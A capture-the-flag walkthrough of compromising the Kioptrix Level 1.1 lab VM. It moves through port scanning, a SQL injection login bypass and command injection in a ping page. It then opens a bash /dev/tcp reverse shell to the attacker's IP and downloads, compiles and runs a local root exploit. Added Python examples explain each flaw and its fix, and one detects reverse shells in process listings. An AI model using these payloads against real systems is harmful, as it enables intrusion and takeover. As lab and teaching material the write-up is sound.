Kioptrix: Level 1.1 (#2)

Find the target IP: nmap 172.16.219.0/24

Nmap scan report for 172.16.219.169
Host is up (0.00019s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
443/tcp  open  https
631/tcp  open  ipp
3306/tcp open  mysql
MAC Address: 00:0C:29:F6:5D:41 (VMware)

Or using netdiscover:

root@kali:# netdiscover -i eth0 -r 172.16.219.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts                 

 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240               
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 172.16.219.1    00:50:56:c0:00:08      1      60  VMware, Inc.                
 172.16.219.2    00:50:56:f6:28:ea      1      60  VMware, Inc.                
 172.16.219.169  00:0c:29:f6:5d:41      1      60  VMware, Inc.                
 172.16.219.254  00:50:56:ef:ff:1d      1      60  VMware, Inc.                

[5]+  Stopped                 netdiscover -i eth0 -r 172.16.219.0/24

Found target: 172.16.219.169

Probe the services now: nmap -sV -sC 172.16.219.169

Starting Nmap 7.31 ( https://nmap.org ) at 2018-01-16 21:23 PST
Nmap scan report for 172.16.219.169
Host is up (0.00015s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            790/udp  status
|_  100024  1            793/tcp  status
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
|_ssl-date: 2018-01-17T20:32:45+00:00; +15h08m56s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
631/tcp  open  ipp      CUPS 1.1
| http-methods: 
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:F6:5D:41 (VMware)

Host script results:
|_clock-skew: mean: 15h08m56s, deviation: 0s, median: 15h08m56s

Post-scan script results:
| clock-skew: 
|_  15h08m56s: Majority of systems scanned
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.18 seconds

Navigate to http://172.16.219.169/ in a browser; it is a login page. Try the username admin' or 1=1# with a random password. It worked!
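Why admin' or 1=1# logs you in, and what the fix looks like. The following Python is an added example, not code from this write-up or from the Kioptrix VM: it models the login check against an in-memory SQLite table with one constructed admin row. SQLite has no # comment, so the runnable payload uses the standard -- comment; build_vulnerable_query shows the exact query text the page's # payload produces on the target's MySQL, where # starts a comment.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the login app's users table (constructed row, not the target's data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Plaintext password only to keep the example short; a real app stores a password hash.
    conn.execute("INSERT INTO users VALUES ('admin', 'hunter2')")
    conn.commit()
    return conn


def build_vulnerable_query(username: str, password: str) -> str:
    """String concatenation: a quote in the input closes the literal and the rest is parsed as SQL.

    With the write-up's payload the WHERE clause becomes
        username = 'admin' or 1=1#' AND password = '...'
    and MySQL treats everything after # as a comment, so the password check disappears.
    """
    return (f"SELECT username FROM users WHERE username = '{username}' "
            f"AND password = '{password}'")


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Runs the concatenated query; returns the matched username or None."""
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str):
    """Placeholders: the values travel separately from the SQL text, so the payload is
    compared as a literal string and never changes the statement's structure."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    # SQLite spelling of the page's admin' or 1=1# (SQLite comments start with -- not #).
    payload = "admin' or 1=1-- "
    print(build_vulnerable_query("admin' or 1=1#", "x"))
    print("vulnerable   :", login_vulnerable(db, payload, "wrong"))      # admin
    print("parameterized:", login_parameterized(db, payload, "wrong"))   # None
```

The parameterized version returns None for the payload because the quote and the or 1=1 are just characters of a username that does not exist; the only way to get admin back is to supply the real password.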

After logging in, the page provides a ping function. Trying the command 127.0.0.1;whoami gave the following output:

The app is vulnerable to command injection.
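What makes 127.0.0.1;whoami work, and how a ping handler avoids it. This is an added Python example, not the VM's code: the original handler is PHP (pingit.php) and its source is not shown in the write-up, so the ping -c 3 command line, the function names and the validation rules here are assumptions. The vulnerable path splices the field into a shell command line, where ; ends the ping command and starts a second one; the hardened path accepts only an IP literal or an RFC 1123 hostname and hands it to ping as a single argv element with no shell in between.

```python
import ipaddress
import re
import shlex
import subprocess
from typing import List

# RFC 1123 hostname: labels of letters, digits and hyphens with no leading or trailing
# hyphen, so a validated target can never begin with '-' and be read by ping as an option.
_LABEL = r"[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"(?=.{{1,253}}$){_LABEL}(\.{_LABEL})*")


def is_valid_target(target: str) -> bool:
    """Accept only an IPv4/IPv6 literal or a syntactically valid hostname."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        return _HOSTNAME_RE.fullmatch(target) is not None


def build_vulnerable_command(target: str) -> str:
    """What a system()/shell=True style handler runs: the form field is spliced into a
    command line that a shell then parses (assumed shape of the original handler)."""
    return f"ping -c 3 {target}"


def shell_tokens(command: str) -> List[str]:
    """Tokenise like a POSIX shell would; shows ';' splitting the line into two commands."""
    return list(shlex.shlex(command, posix=True, punctuation_chars=True))


def build_safe_argv(target: str) -> List[str]:
    """Hardened form: validate first, then pass the target as one argv element."""
    if not is_valid_target(target):
        raise ValueError(f"rejected ping target: {target!r}")
    return ["ping", "-c", "3", target]


def run_ping(target: str) -> str:
    """Execute the hardened command with no shell; the target can only ever be an argument."""
    argv = build_safe_argv(target)
    done = subprocess.run(argv, capture_output=True, text=True, timeout=15)
    return done.stdout


if __name__ == "__main__":
    payload = "127.0.0.1;whoami"
    print(build_vulnerable_command(payload))
    print(shell_tokens(build_vulnerable_command(payload)))
    print(build_safe_argv("127.0.0.1"))
    try:
        build_safe_argv(payload)
    except ValueError as err:
        print(err)
```

Validation is an allowlist, not a blocklist of metacharacters: the field is accepted only if it is entirely an address or hostname, which rules out ;, |, &, newlines and backticks without having to enumerate them.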

Running ;cat /etc/*-release shows that the server is CentOS release 4.5 (Final). This version has a privilege escalation vulnerability and the exploit can be found here: https://www.exploit-db.com/exploits/9542/

Run nc -nvlp 443 on the Kali VM to start a netcat listener waiting for the inbound shell.

Inject the following command: ;bash -i >& /dev/tcp/172.16.219.165/443 0>&1, where 172.16.219.165 is my Kali VM's IP address. (When a command is executed on a /dev/tcp/$host/$port pseudo-device file, Bash opens a TCP connection to the associated socket: http://tldp.org/LDP/abs/html/devref1.html)
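The defender-side view of the /dev/tcp reverse shell above: it runs as the web server user, under a sh -c that httpd spawned for the ping handler, so a plain process listing is enough to spot it. This Python is an added example, not part of the write-up; the ps -eo user,pid,ppid,args output is constructed to resemble the session (the ping -c 3 command, the PIDs and the httpd path are made up), and the matching rules are my own.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample of `ps -eo user,pid,ppid,args`, modelled on the write-up's session.
# Not captured from the target; PIDs, paths and the ping command line are invented.
SAMPLE_PS = """\
USER       PID  PPID ARGS
root         1     0 init
root      1931     1 /usr/sbin/httpd
apache    1940  1931 /usr/sbin/httpd
apache    2104  1940 sh -c ping -c 3 127.0.0.1;bash -i >& /dev/tcp/172.16.219.165/443 0>&1
apache    2105  2104 bash -i
apache    2110  1940 sh -c ping -c 3 127.0.0.1
apache    2111  2110 ping -c 3 127.0.0.1
root      2200     1 bash -i
"""

# Ordered rules: the first one that matches names the finding.
RULES = [
    ("network-pseudo-device", re.compile(r"/dev/(tcp|udp)/")),
    ("interactive-shell", re.compile(r"(^|\s|/)(ba|da)?sh\s+-[A-Za-z]*i\b")),
    ("netcat-or-socat", re.compile(r"(^|\s|/)(nc|ncat|netcat|socat)\b")),
]

Proc = Tuple[str, int, str]  # (user, ppid, args)


def parse_ps(text: str) -> Dict[int, Proc]:
    """Map pid -> (user, ppid, args) from ps -eo user,pid,ppid,args output."""
    procs: Dict[int, Proc] = {}
    for line in text.splitlines()[1:]:            # skip the header row
        user, pid, ppid, args = line.split(None, 3)
        procs[int(pid)] = (user, int(ppid), args)
    return procs


def under_web_server(pid: int, procs: Dict[int, Proc], marker: str = "httpd") -> bool:
    """True if the process or any ancestor has the web server binary on its command line."""
    seen = set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        _user, ppid, args = procs[pid]
        if marker in args:
            return True
        pid = ppid
    return False


def find_suspicious(text: str, web_user: str = "apache") -> List[Tuple[int, str]]:
    """Flag processes owned by the web server user, descended from httpd, that match a rule.

    An interactive bash owned by root (pid 2200 in the sample) is an admin's login shell
    and is not reported; the same command line under apache/httpd is."""
    procs = parse_ps(text)
    hits: List[Tuple[int, str]] = []
    for pid, (user, _ppid, args) in sorted(procs.items()):
        if user != web_user or not under_web_server(pid, procs):
            continue
        for name, rx in RULES:
            if rx.search(args):
                hits.append((pid, name))
                break
    return hits


if __name__ == "__main__":
    for pid, reason in find_suspicious(SAMPLE_PS):
        print(f"pid {pid}: {reason}")
```

The ancestry check is what keeps the false positives down: shells and netcat are ordinary tools, but none of them belong in a process tree rooted at httpd.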

root@kali:# nc -nvlp 443
listening on [any] 443 ...
connect to [172.16.219.165] from (UNKNOWN) [172.16.219.169] 32770
bash: no job control in this shell
bash-3.00$ wget https://www.exploit-db.com/download/9542.c
--17:40:34--  https://www.exploit-db.com/download/9542.c
           => `9542.c'
Resolving www.exploit-db.com... 192.124.249.8
Connecting to www.exploit-db.com|192.124.249.8|:443... connected.
ERROR: Certificate verification error for www.exploit-db.com: unable to get local issuer certificate
ERROR: certificate common name `*.sucuri.net' doesn't match requested host name `www.exploit-db.com'.
To connect to www.exploit-db.com insecurely, use `--no-check-certificate'.
Unable to establish SSL connection.
bash-3.00$ wget https://www.exploit-db.com/download/9542.c --no-check-certificate
--17:41:35--  https://www.exploit-db.com/download/9542.c
           => `9542.c'
Resolving www.exploit-db.com... 192.124.249.8
Connecting to www.exploit-db.com|192.124.249.8|:443... connected.
WARNING: Certificate verification error for www.exploit-db.com: unable to get local issuer certificate
WARNING: certificate common name `*.sucuri.net' doesn't match requested host name `www.exploit-db.com'.
HTTP request sent, awaiting response... 200 OK
Length: 2,643 (2.6K) [application/txt]
9542.c: Permission denied

Cannot write to `9542.c' (Success).
bash-3.00$ ls
index.php
pingit.php
bash-3.00$ ls /var/www
cgi-bin
error
html
icons
manual
usage
bash-3.00$ cd /var/tmp
bash-3.00$ wget https://www.exploit-db.com/download/9542.c --no-check-certificate
--17:46:18--  https://www.exploit-db.com/download/9542.c
           => `9542.c'
Resolving www.exploit-db.com... 192.124.249.8
Connecting to www.exploit-db.com|192.124.249.8|:443... connected.
WARNING: Certificate verification error for www.exploit-db.com: unable to get local issuer certificate
WARNING: certificate common name `*.sucuri.net' doesn't match requested host name `www.exploit-db.com'.
HTTP request sent, awaiting response... 200 OK
Length: 2,643 (2.6K) [application/txt]

    0K ..                                                    100%  630.14 MB/s

17:46:18 (630.14 MB/s) - `9542.c' saved [2643/2643]

bash-3.00$ ls
9542.c
bash-3.00$ gcc -o exp 9542.c
9542.c:109:28: warning: no newline at end of file
bash-3.00$ ls
9542.c
exp
bash-3.00$ ./exp
sh: no job control in this shell
sh-3.00# whoam i
sh: whoam: command not found
sh-3.00# whoami
root
sh-3.00# 

The apache user does not have permission to write to the /var/www/html folder, so I downloaded the exploit to /var/tmp instead. It worked! Then compile and run the exploit. I'm root now.
